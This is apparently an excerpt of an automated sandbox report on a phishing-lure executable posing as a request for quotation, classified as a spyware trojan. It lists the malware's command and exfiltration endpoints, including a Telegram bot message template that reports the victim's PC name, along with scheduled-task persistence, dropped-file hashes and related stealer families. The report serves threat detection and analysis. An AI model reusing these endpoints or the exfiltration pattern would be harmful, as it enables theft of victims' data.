http://aborters.duckdns.org:8081	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/x	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75$	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	high
https://www.office.com/lBsq	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559184
Start date and time:	2024-11-20 09:32:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 200 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, PID 5268 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Simulations

Behavior and APIs

Time	Type	Description
03:33:00	API Interceptor	8905308x Sleep call for process: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe modified
03:33:03	API Interceptor	32x Sleep call for process: powershell.exe modified
03:33:05	API Interceptor	6700425x Sleep call for process: jnqeRRexnD.exe modified
09:33:05	Task Scheduler	Run new task: jnqeRRexnD path: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.96.3	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download
	gusetup.exe	Get hash	malicious	Unknown	Browse	go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	rPO_1079021908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
api.telegram.org	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse	149.154.167.220
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse	149.154.167.220
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://2kio0wi0iat.freewebhostmost.com	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	104.21.4.93
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.96.3
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Benefit Enrollment -wZ5nusm.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	rPO_1079021908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	Towered.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	quote001.vbs	Get hash	malicious	GuLoader	Browse	149.154.167.220
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	149.154.167.220
	https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/preview	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jnqeRRexnD.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379494043211775
Encrypted:	false
SSDEEP:	48:fWSU4xympx4RhgZoU99tK8NPZHUJ7u1iMugeC/ZqUyus:fLHxv/I6WA2KRHKOugzs
MD5:	65C8A8195D8C3A860738FA84F5E0E2CA
SHA1:	A14579945A9E0C7AE44F6F7A94573CACC3166F79
SHA-256:	3C0C30803F2F32A3254CBB415F55DF0344C2BC5144359EFEA489306D5163BAE5
SHA-512:	AD09015D0779795086087E60EDC97924E61322F7E5A62A484D868595236D26CCF62489F6CE791681B3A56F4FD47DE84D2659A420ACEB755C63128922ED478A5E
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e5lt4vg.dcb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asb4y0ad.4e0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hs1dmcae.dz1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nscw2rby.mia.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbbdcaxc.lnv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5zlmxw.zdt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdac2bg5.3eo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywn404b5.fgj.ps1

